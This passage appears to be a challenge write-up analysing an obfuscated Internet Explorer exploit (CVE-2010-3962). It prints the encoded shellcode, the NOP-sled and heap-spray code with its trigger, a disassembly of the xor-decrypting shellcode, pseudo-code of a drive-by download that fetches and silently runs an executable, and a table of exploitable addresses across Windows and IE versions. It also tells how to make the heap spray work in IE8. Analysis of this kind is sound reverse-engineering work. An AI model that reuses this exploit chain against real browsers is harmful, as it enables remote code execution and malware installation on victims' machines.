	"wo0o2E80wo0oC587wo0o8780wo0oA45Awo0o5AEDwo0oFFA5wo0oD2A9wo0o8724" +
	"wo0oA75Awo0oD2F1wo0oE224wo0o9818wo0o7C90wo0o14D2wo0o0AE2wo0o6FDE" +
	"wo0oEBC1wo0oA507wo0o10D9wo0oDC1Awo0o0BD2wo0o3A91wo0oEA20wo0oA4CE" +
	"wo0o8F36wo0o8F5Awo0oD2F5wo0oB70Cwo0oDD5Awo0o5A9Awo0oCD8Fwo0o0CD2" +
	"wo0oD55Awo0oD25Awo0o7A14wo0o888Fwo0o8412wo0o3D5Awo0o3D52wo0o8385" +
	"wo0o8280wo0o8687wo0oAC5Cwo0o687Dwo0oD1C4wo0oD1D1wo0o1D69wo0o1D1D" +
	"wo0o221Dwo0o167Awo0o2D94wo0oD1D1wo0oD1D1wo0o175Awo0o1152wo0o8191" +
	"wo0o945Awo0o81D9wo0o872Ewo0o52C9wo0oD915wo0o9458wo0o5229wo0o29AC" +
	"wo0oA4D1wo0oE2D6wo0o3811wo0oD11Dwo0oD1D1wo0o1F5Awo0o1052wo0o8095" +
	"wo0o9C5Awo0o80DDwo0o872Ewo0o52C9wo0oD915wo0o9458wo0o5225wo0o25AC" +
	"wo0oA4D1wo0oE2D6wo0o3811wo0oD17Dwo0oD1D1wo0o9416wo0oD13Dwo0oD1D1" +
	"wo0o5AD1wo0o2584wo0oBB83wo0oBBD0wo0o5AD7wo0o5207wo0o9913wo0o2E83" +
	"wo0oF187wo0o1552wo0o69C1wo0oD1D0wo0oD1D1wo0o1154wo0oBEA5wo0o9C5A" +
	"wo0o8029wo0oD0BBwo0oD0BBwo0o845Cwo0o8321wo0o872Ewo0o52CDwo0oC115" +
	"wo0o9458wo0o522Dwo0o2DACwo0oA4D1wo0o3AD3wo0o5A83wo0o3D94wo0o1152" +
	"wo0o58D0wo0o3D94wo0oAC52wo0oD73Dwo0oD3AEwo0o183Awo0o9C5Awo0o5021" +
	"wo0o2E30wo0oD1D1wo0o54D1wo0oA518wo0o5AF1wo0o2184wo0o3350wo0oD12E" +
	"wo0oD1D1wo0oEF68wo0oD1D1wo0o50D1wo0o2E30wo0oD1D1wo0oEAD1wo0oA500" +
	"wo0o5BD9wo0o2194wo0oEFE5wo0o9459wo0o5A21wo0o259Cwo0oBB80wo0oBBD0" +
	"wo0o5CD0wo0o2184wo0o2E83wo0oF187wo0o1552wo0o3AC1wo0o5A59wo0o2994" +
	"wo0o2E81wo0oF587wo0o1552wo0o5AD5wo0o259Cwo0o2E80wo0oF587wo0o1552" +
	"wo0o69D5wo0oD1D0wo0oD1D1wo0o8F8Ewo0o888Awo0o528Bwo0o8515wo0o345A" +
	"wo0o128Cwo0oF439wo0o2E2Cwo0o5F2Ewo0oDF9Fwo0oE23Dwo0o5B1Bwo0o498A" +
	"wo0o5B2Fwo0oF4DFwo0o2E61wo0o6113wo0oFC98wo0oA50Awo0o99CFwo0oBF1C" +
	"wo0oFFADwo0o7530wo0oDFA8wo0o0936wo0o765Bwo0o8936wo0o4F9Dwo0oE70A" +
	"wo0oFECBwo0o8FA1wo0o306Awo0oC3CAwo0o1AD3wo0oE0C4wo0oE2E3wo0oE4E5" +
	"wo0oE6E7wo0oE8E9wo0oD1E1wo0oA3D1wo0oFAB3wo0oA6D1wo0oFAB3wo0o9CD1" +
	"wo0o418Bwo0oD2D1wo0oD1D1wo0o98D1wo0o8994wo0o9D81wo0o839Ewo0oFF94" +
	"wo0o8994wo0oD194wo0oA1BEwo0oBFB4wo0oB9D1wo0oA5A5wo0oEBA1wo0oFEFE" +
	"wo0oA6A6wo0oFFA6wo0oB9B0wo0oBDBFwo0oB3B0wo0oB2FFwo0oBCBEwo0oBAD1" +
	"wo0oA8B4wo0oEBF1wo0oB9F1wo0oBDB4wo0oBEBDwo0o90F1wo0o9482wo0o9192" +
	"wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0o91F0" +
	"wo0o91F0wo0o91F0wo0o91F0wo0o91F0wo0oD1F0"
);
shellcode = unescape(shellcode_esc.replace(/wo0o/g,"%u"));

// Make NOP-sled
var nopsled_len = 0x86000 - (shellcode.length * 2);
nopsled_short = unescape(
	'%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090' +
	'%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090' +
	'%u9090%u9090%u9090%u9090%u9090%u9090%u9090');
while(nopsled_short.length < nopsled_len / 2)
{
	nopsled_short += nopsled_short;
}
var nopsled = nopsled_short.substring(0, nopsled_len / 2);

// Heap Splay
mem = new Array();
for(i=0; i<1500; i++)
{
	mem[i] = nopsled + nopsled + shellcode;
}

// Exploit it!
document.write("<table style=position:absolute;clip:rect(0)>");

It is very easy to understand. By `unescape'ing the long string, it expands to the shellcode. And this script concatinates the shellcode with very-very long NOP-sled and do heap-splay. And then, exploit the browser. From this script, I can guess some interesting things.

I guess shellcode is ran following NOP-sled so I assume this shellcode is valid x86-code and now decode and disassemble it.

; SHELLCODE header (disassembled by ndisasm 2.08)
; POC Hackers' Dream contest

; 1. jump near the payload
00000000  EB10              jmp short 0x12
; 3. ebx is now absolute address of payload
00000002  5B                pop ebx
; 4. decrypt the payload (xor 0xd1)
;    note that ebx is pre-decremented because
;    loop instruction is executed when ecx != 0.
;    if first `dec ebx' is missing, first byte of
;    payload is not decrypted which causes crash.
00000003  4B                dec ebx
00000004  33C9              xor ecx,ecx
00000006  66B98303          mov cx,0x383
0000000A  80340BD1          xor byte [ebx+ecx],0xd1
0000000E  E2FA              loop 0xa
; 5. run shellcode payload
00000010  EB05              jmp short 0x17
; 2. dummy call (to get current EIP)
00000012  E8EBFFFFFF        call dword 0x2
00000017  (encrypted payload following)

It is so obvious! In the shellcode header, it uses xor decryption (with byte-key 0xd1) and runs its payload following decryption.

2-2. Decrypted Payload

By decrypting the payload as the same way as its header, I found some interesting strings.

I believe the string beginning with 'key : ' is the key.

First, I thought this part of string is just a placeholder. I thought REAL key appear after `running' the shellcode, but this part is not modified during shellcode execution.

FYI, I will show the pseudo-code of shellcode activity.

// CAUTION: This is a pseudo-code.
// The real shellcode is more complicated and `dangerous'.
HINSTANCE hInstance;
char file1[256];
char file2[256];

// load the address of various APIs
hInstance = /* known address of kernel32.dll */;
GetProcAddress(hInstance, "LoadLibraryA");
GetProcAddress(hInstance, "GetTempPathA");
GetProcAddress(hInstance, "WinExec");
GetProcAddress(hInstance, "DeleteFileA");
GetProcAddress(hInstance, "Sleep");
hInstance = LoadLibraryA("msvcrt");
GetProcAddress(hInstance, "exit");
GetProcAddress(hInstance, "fopen");
GetProcAddress(hInstance, "fread");
GetProcAddress(hInstance, "fwrite");
GetProcAddress(hInstance, "fclose");
hInstance = LoadLibraryA("urlmon");
GetProcAddress(hInstance, "URLDownloadToFileA");
hInstance = LoadLibraryA("shell32");
GetProcAddress(hInstance, "ShellExecuteA");
GetProcAddress(hInstance, "SHGetSpecialFolderPathA");

// drive-by-download!
GetTempPathA(256, file1);
strcat(file1, "log.gif");
/*** NOTE THAT URL HAS BEEN NEUTRALIZED. ***/
/*** SO DRIVE-BY-DOWNLOAD DOES NOT WORK. ***/
URLDownloadToFileA(NULL, " : hello ASEC@!@!@!@!@!@!@!@!@!@!@!@!@!", file1, 0, NULL);
SHGetSpecialFolderPathA(NULL, file2, CSIDL_APPDATA, FALSE);
strcat(file2, "\alg.exe");
MALICIOUS_GENERATE_CODE(file1, file2); // generate PE-file `file2'.
WinExec(SW_HIDE, file2);
Sleep(1000);
DeleteFileA(file1);

// show another webpage
ShellExecuteA("open", "IEXPLORE.EXE", "http://www.ahnlab.com", NULL, SW_SHOWMAXIMIZED);

// close current browser
exit( /* unpredictable value */ );

None of these activities modify the key string, at all. So I believe this key string IS THE KEY.

2-3. Differences between OSes

This payload is a bit OS-dependent. Because a part of payload expects DLL code is formed in specific way. I will show you a part of payload disassembly.

; 0. ebx = "msvcrt"
00000035  8BDC              mov ebx,esp
; 1. jump
00000037  EB10              jmp short 0x49
; 3-1. push "msvcrt"
00000039  53                push ebx
; 3-2. push 'ret' instruction
0000003A  FF7634            push dword [esi+0x34]
; 3-3. avoid breakpoints?
0000003D  8BFF              mov edi,edi
0000003F  55                push ebp
00000040  8BEC              mov ebp,esp
; 3-4. edx = &LoadLibraryA
00000042  8B16              mov edx,[esi]
; 3-5. edx = &LoadLibraryA + 5;
;      we have to execute first 5-bytes of LoadLibraryA.
;      assembly code below:
;      - mov  edi, edi
;      - push ebp
;      - mov  ebp, esp
00000044  8D5205            lea edx,[edx+0x5]
; 3-6. call LoadLibraryA(+5)
00000047  FFE2              jmp edx
; 2. push return address
00000049  E8EBFFFFFF        call dword 0x39

This executes 5-bytes after the beginning of LoadLibraryA function (to avoid breakpoints, probably.) In this part, the first 5-bytes (3-instruction) of the function must be formed in the way above. This is the Windows HotPatch specific function prologue.

But, LoadLibraryA function of Windows XP SP0 and SP1 have different form of function prologue because it is not a HotPatch build. So the payload is suffered by the stack problem and just crashes on these verisions of OSes.

Windows XP SP2 is the first operating system version with HotPatch images so target (client) OSes are Windows XP SP2 or later.

More of that, this exploit does not work when DEP is on. It means, target OSes are very limited.

2-4. Differences between IE versions

By googling, I found this vulnerability is CVE-2010-3962. The site above tells me shellcode is very IE-version specific (more specificly, mshtml.dll version specific) and EIP address is uncontrollable by the exploit. I made own payload and ran it in several combinations of IE and OS. Note that I tried `decoded' shellcode, not the `aaencode'd one.

combinationDEP
on IE
ASLR
on IE
aaencode
works
mshtml.dll
base tested
decoded exploit/payload works
XP x86 SP0 (en) / IE6 (mshtml: 6.0.2600.0)nonenoneno74810000no - payload incompatible (INEXPLOITABLE EIP: 0xB87493AD)
XP x86 SP1 (en) / IE6 (mshtml: 6.0.2800.1106)nonenoneno74810000no - payload incompatible (INEXPLOITABLE EIP: 0x84748A62)
XP x86 SP2 (en) / IE6 (mshtml: 6.0.2900.2180)default nononeno7D4A0000no (INEXPLOITABLE EIP: 0xCE7D4F7C)
XP x86 SP2 (en) / IE6 (mshtml: 6.0.2900.3698)default nononeno7DC30000default yes (exploitable EIP: 0x5C7DC9D0)
XP x86 SP3 (en) / IE6 (mshtml: 6.0.2900.5969)default nononeno7DC30000no (INEXPLOITABLE EIP: 0xDC7DC9D0)
XP x86 SP3 (en) / IE6 (mshtml: 6.0.2900.6003)default nononeno7DC30000no (INEXPLOITABLE EIP: 0x837DC9D0)
XP x86 SP3 (en) / IE6 (mshtml: 6.0.2900.6036)default nononeno7DC30000default yes (exploitable EIP: 0x0E7DC9CD)
XP x86 SP2 (en) / IE7 (mshtml: 7.0.5730.13)default nononeno7E830000default yes (exploitable EIP: 0x597E85F9)
XP x86 SP3 (en) / IE7 (mshtml: 7.0.5730.13)default nononeno7E830000default yes (exploitable EIP: 0x597E85F9)
XP x86 SP3 (en) / IE7 (mshtml: 7.0.6000.17080)default nononeno3CEA0000default yes (exploitable EIP: 0x303CEEBB)
XP x86 SP3 (en) / IE7 (mshtml: 7.0.6000.17092)default nononeno3CEA0000no (INEXPLOITABLE EIP: 0xF83CEEBB)
XP x86 SP2 (en) / IE8 (mshtml: 8.0.6001.18702)default nononeyes63580000no - exploit incompatible (possibly exploitable EIP: 0x646367B2)
XP x86 SP3 (en) / IE8 (mshtml: 8.0.6001.18702)default yesnoneyes63580000no - exploit incompatible (possibly exploitable EIP: 0x646367B2)
XP x86 SP3 (en) / IE8 (mshtml: 8.0.6001.18939)default yesnoneyes3CEA0000no - exploit incompatible (possibly exploitable EIP: 0x1D3CF5BD)
XP x86 SP3 (en) / IE8 (mshtml: 8.0.6001.18975)default yesnoneyes3CEA0000no - exploit incompatible (possibly exploitable EIP: 0x4D3CF5BF)
XP x64 SP1 (en) / IE6 (mshtml: 6.0.3790.2643 ; 32-bit)default nononeno4A500000no (INEXPLOITABLE EIP: 0x9B4A5B08)
XP x64 SP2 (en) / IE6 (mshtml: 6.0.3790.3959 ; 32-bit)default nononeno02580000default yes (exploitable EIP: 0x5102A2B7)
XP x64 SP2 (en) / IE6 (mshtml: 6.0.3790.4772 ; 32-bit)default nononeno02490000no (INEXPLOITABLE EIP: 0x910292B7)
XP x64 SP2 (en) / IE7 (mshtml: 7.0.5730.13 ; 32-bit)default nononeno63580000default yes (exploitable EIP: 0x59635AF9)
XP x64 SP2 (en) / IE7 (mshtml: 7.0.6000.17092 ; 32-bit)default nononeno3F9A0000no (INEXPLOITABLE EIP: 0xF83F9EBB)
XP x64 SP2 (en) / IE8 (mshtml: 8.0.6001.18702 ; 32-bit)default nononeyes63580000no - exploit incompatible (possibly exploitable EIP: 0x646367B2)
XP x64 SP2 (en) / IE8 (mshtml: 8.0.6001.18975 ; 32-bit)default nononeyes3F9A0000no - exploit incompatible (possibly exploitable EIP: 0x4D3FA5BF)
Svr2k3 x86 SP0 (en) / IE6 (mshtml: 6.0.3790.0)nonenoneno745E0000no - payload incompatible (INEXPLOITABLE EIP: 0xAD745E3F)
Svr2k3 x86 SP0 (en) / IE6 (mshtml: 6.0.3790.630)nonenoneno77380000no - payload incompatible (exploitable EIP: 0x117745FE)
Svr2k3 x86 SP1 (en) / IE6 (mshtml: 6.0.3790.1830)default yesnoneno7D0E0000no (INEXPLOITABLE EIP: 0xA17D1900)
Svr2k3 x86 SP1 (en) / IE6 (mshtml: 6.0.3790.3304)default yesnoneno4A500000default no - blocked by DEP (exploitable EIP: 0x324A5B06)
Svr2k3 x86 SP2 (en) / IE6 (mshtml: 6.0.3790.4470)default yesnoneno7F9E0000no (INEXPLOITABLE EIP: 0xB17FABB7)
Svr2k3 x64 SP1 (en) / IE6 (mshtml: 6.0.3790.1830 ; 32-bit)default yesnoneno7D0E0000no (INEXPLOITABLE EIP: 0xA17D1900)
Svr2k3 x64 SP1 (en) / IE6 (mshtml: 6.0.3790.3304 ; 32-bit)default yesnoneno4A500000default no - blocked by DEP (exploitable EIP: 0x324A5B06)
Vista x86 SP0 (en) / IE7 (mshtml: 7.0.6000.16386)default yes*default yesno6D440000no (INEXPLOITABLE EIP: 0xE36D48B9)
Vista x86 SP1 (en) / IE7 (mshtml: 7.0.6001.18000)default yes*default yesno6BB60000default no (exploitable EIP: 0x596BC2FE / can vary)

The target script won't run on IE8 because heap-splay code is WRONG in this version of browser. Target script uses /* deobfuscated form */ mem[i] = nopsled + nopsled + shellcode; for heap-splay but this chunk will be translated into a pointer-copy (not a content-copy!) in IE8. So the target script is no longer heap-splay in IE8. This is amazing! None of the browser can actually run the exploit in Web-Challenge.html without decoding it! How safe it is! To make the shellcode run, we have to use `substring' (or substr) method to force IE8 to use content-copy (not pointer-copy. Even though, the exploit can fail because of heap-splay failure. I did not care whether heap-splay fails.)

Second notable thing is: address is actually mshtml.dll dependent but can vary between platform. Look at the IE7, mshtml version 7.0.5730.13. It has same exploit EIP (0x597E85F9) for x86 editions but x64 edition has different exploit EIP (0x59635AF9). It is because the loaded base address of mshtml.dll is different (even the exact same binary is loaded, exploit EIP is different.)

Others...